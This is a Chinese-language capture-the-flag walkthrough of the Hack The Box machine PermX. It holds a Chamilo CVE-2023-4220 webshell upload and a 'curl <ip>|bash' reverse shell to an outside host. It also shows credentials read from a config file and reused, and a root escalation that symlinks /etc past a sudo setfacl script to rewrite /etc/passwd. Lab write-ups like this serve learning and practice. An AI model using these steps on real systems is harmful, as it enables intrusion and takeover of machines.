当前位置: 首页 > news >正文

PermX-htb

0x01 立足

信息收集

端口扫描

nmap -sSCV -Pn 10.10.11.23

正常开启22和80端口

访问web页面

并没有看到有攻击点

这个页面可先记录一会儿有需要的话可以尝试xss获取cookie

域名扫描

ffuf -w 1.txt -u http://permx.htb/ -H 'Host:FUZZ.permx.htb'

这里用的ffuf扫描工具

扫出了lms子域名

访问lms.permx.htb

访问前先写入hosts文件

windows

linux

这里能看到应该是个系统后台登录

先记录

  1. 是个chamilo的框架,可尝试nday
  2. 可尝试sql注入
  3. 可尝试弱口令
  4. 存在遗忘密码界面,可尝试逻辑漏洞

目录扫描

扫一下子域名目录,顺便基础渗透测试

访问/.bowerrc目录出现一个路径

/app/Resources/public/assets/

再次访问发现出现目录遍历

翻找一圈以后并没有找到利用点

搜索框架看是否存在nday

这里似乎存在CVE-2023-4220

看这个nday的攻击点似乎是在此路径下,去出现目录遍历的地方看是否存在攻击点

访问此路径

/main/inc/lib/javascript/bigupload/files/ 

这里能看到存在上传点以及存在别人上传的后门文件

把poc拉取下来

python3 main.py -u http://lms.permx.htb -a webshell

成功上传shell   kk

这里后续可以继续用poc拿shell这里我是直接执行命令弹shell

可执行命令

尝试反弹shell

这里我用curl反弹shell

curl%2010.10.16.4|bash

拿到shll(注意关闭防火墙如果使用虚拟机的话)

0x02 拿到用户权限

看一下etc/passwd

从这里看有存在的用户只有root和mtz,需要想办法登录mtz

这里在app/config/configuration.php发现敏感信息

发现mysql登录账密
用户:chamilo

密码:03F6lY3uXAP2bkW8

数据库:chamilo

尝试登录mysql

是用chamilo数据库

show tables;

查看数据表有哪些发现存在user表直接访问

存在admin和anon的用户以及密码并没有看到mtz

这里会出现一个问题,找不到密码,数据库里的密码破解出来也登陆不上mtz,后来试了下数据库的密码成功登上了,这个就类似于密码喷洒。

成功登录

0x03 提权

sudo -l看有那些此用户能以root权限使用的程序

这里能看到这里存在一个acl.sh的bash命令文件

查看一下

简单来说这里就是过滤传入参数

最后以sudo执行setfacl命令来更改此文件此用户的权限

首先会接入三个参数需要修改的用户、需要修改的权限、以及需要修改权限的文件


然后会对想修改的文件进行三次判断

  1. 必须是/home/mtz文件下
  2. 不能有..
  3. 必须是文件

这里我原本想到的两个绕过方法都给禁了,软链接和../

#!/bin/bashif [ "$#" -ne 3 ]; then/usr/bin/echo "Usage: $0 user perm file"exit 1
fiuser="$1"
perm="$2"
target="$3"if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then/usr/bin/echo "Access denied."exit 1
fi# Check if the path is a file
if [ ! -f "$target" ]; then/usr/bin/echo "Target must be a file."exit 1
fi/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

软链接绕过

这里尝试了一会儿

利用使用目录创建软链接来绕过他要求只能是文件的过滤

比如说:

平时的软连接是    ln -s /etc/123

/home/123/123    >>  /etc/123

直接使用etc作为软链接    ln -s /etc

/home/123/etc/123    >>    /etc/123

直接拿’/‘跟目录创建软链接或者/etc/创建软链接,如果想直接把root/root.txt创建软链接的话,执行该权限的命令时他会告诉你无法访问没有权限,但是etc文件是可以访问的,直接使用

生成密码

openssl passwd 123456

创建软链接

ln -s /etc

修改权限

sudo /opt/acl.sh mtz rwx /home/mtz/etc/passwd

添加特权用户

echo '123456:$1$mixgqSMG$LOoNrVvfTa2RjhLEFJNQ00:0:0:root:/root:/bin/bash' > /home/mtz/etc/passwd

最后登录123456密码123456

http://www.lryc.cn/news/415384.html

相关文章:

  • 解密RCE漏洞:原理剖析、复现与代码审计实战
  • 打造智能家居:用React、Node.js和WebSocket构建ESP32设备控制面板(代码说明)
  • 计网:从输入URL到网页显示期间发生了什么
  • 龚宇引以为傲的“爆款制造营”,爱奇艺怕是要爽约了
  • org.springframework.web.client.HttpClientErrorException$NotFound异常
  • 在开关电源转换器中充分利用碳化硅器件的性能优势
  • QObject::connect: Cannot queue arguments of type ‘QList<QString>‘
  • 基于K8S部署安装Jenkins
  • 24-8-4-读书笔记(十三)-《莎士比亚全集》(第一卷(续)) [英] 威廉·莎士比亚 [译]朱生豪
  • linux nicstat
  • 程序员如何积累人脉?光靠技术不行了~
  • 初识增强现实(AR)
  • 开关电源起振是什么看了就知道
  • Modbus_Ascii协议
  • 树莓派在功能和成本之间的 “惊人平衡 “支持了全球数字标牌的成功故事!
  • C++ 学习记录
  • C#中的TCP和UDP
  • Spring中使用嵌套事务及事务保存点
  • SFT、RLHF、DPO、IFT —— LLM 微调的进化之路
  • 【数据结构】LinkedList与链表
  • 《LeetCode热题100》---<5.①普通数组篇五道>
  • 根据id查找树形结构中匹配数据与上级所有数据
  • 探索亚马逊Amazon S3:无缝存储管理与极速数据传输的奥秘
  • Linux_监测CPU和内存
  • OpenCV经典案例:01 答题卡识别
  • 进程的管理与控制详解:创建、终止、阻塞等待与非阻塞等待
  • 【从零开始一步步学习VSOA开发】开发环境搭建
  • 一篇文章让你用我的世界中的红石搞懂什么是ALU!
  • 硬盘数据恢复:所需时长、全面指南及注意事项
  • 基于SpringBoot+Vue的科研管理系统(带1w+文档)